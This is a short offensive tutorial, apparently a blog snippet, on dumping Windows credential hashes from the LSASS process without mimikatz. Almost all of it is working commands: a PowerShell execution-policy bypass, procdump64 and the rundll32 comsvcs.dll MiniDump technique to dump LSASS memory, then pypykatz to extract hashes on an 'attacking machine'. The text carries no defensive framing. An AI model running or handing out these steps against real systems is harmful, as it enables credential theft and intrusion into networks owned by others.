Don't need mimikatz. You can now dump hashes from LSASS by abusing LSASS process and generate a lsass.dmp file. After that we will use pypykatz to extarct the hashes from lsass.dmp file.
First we must have an administrative privilege to carry this attack. Upload procdump64.exe to target machine.
powershell.exe -ep bypassget-process lsass
In our case 596 is the lsass process ID. Execute it with procdump64.exe and generate a file contain hashes.
.\procdump64.exe -accepteula -ma 596 lsass.dmpWe can also use native DLLs instead of procdump64.exe, this way we don't have to upoad anything on target machine.
C:\\Windows\\System32\\rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump 596 C:\\Users\\Bob\\Desktop\\lsass.dmp full
After downloading that lsass.dmp file to our attacking machine, now we can exctract the hashes using pypykatz.
pypykatz lsa minidump lsass.dmp